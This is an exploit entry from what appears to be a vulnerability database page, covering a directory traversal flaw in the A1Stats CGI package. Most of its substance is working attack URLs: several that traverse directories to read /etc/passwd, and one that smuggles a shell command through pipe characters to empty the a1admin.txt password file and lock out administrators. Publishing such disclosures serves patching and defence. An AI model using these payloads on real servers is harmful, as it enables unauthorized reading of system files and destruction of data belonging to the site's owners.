• News
• Infocus
• Foundations
• Microsoft
• Unix
• IDS
• Incidents
• Virus
• Pen-Test
• Firewalls
• Columnists
• Mailing Lists
• Newsletters
• Bugtraq
• Focus on IDS
• Focus on Linux
• Focus on Microsoft
• Forensics
• Pen-test
• Security Basics
• Vuln Dev
• Vulnerabilities
• Jobs
• Job Opportunities
• Resumes
• Job Seekers
• Employers
• Tools
• RSS
• News
• Vulns
• Security Research

• info
• discussion
• exploit
• solution
• references

Drummon Miles A1Stats Directory Traversal Vulnerability

(courtesy <neme-dhc@hushmail.com>):

To test these vulnerabilities, try the following.
www.server.com/cgi-bin/a1stats/a1disp3.cgi?../../../../../../../etc/passwd

www.server.com/cgi-bin/a1stats/a1disp4.cgi?../../../../../../../etc/passwd

These two will give you /etc/passwd.

www.server.com/cgi-bin/a1stats/a1disp2.cgi?../../../../../../../etc/passwd

This will also give you /etc/passwd but it will
show it in a very mangled manner as the CGI adds
HTML tags to what it thinks is a file it created
itself.

One can also open a file and wreck its contents.

http://localhost/cgi-bin/a1stats/a1disp.cgi?|echo%20>a1admin.txt|

will empty a1admin.txt. a1admin.txt contains the
password to change settings of the CGI. When this
file is removed, no one can log in anymore.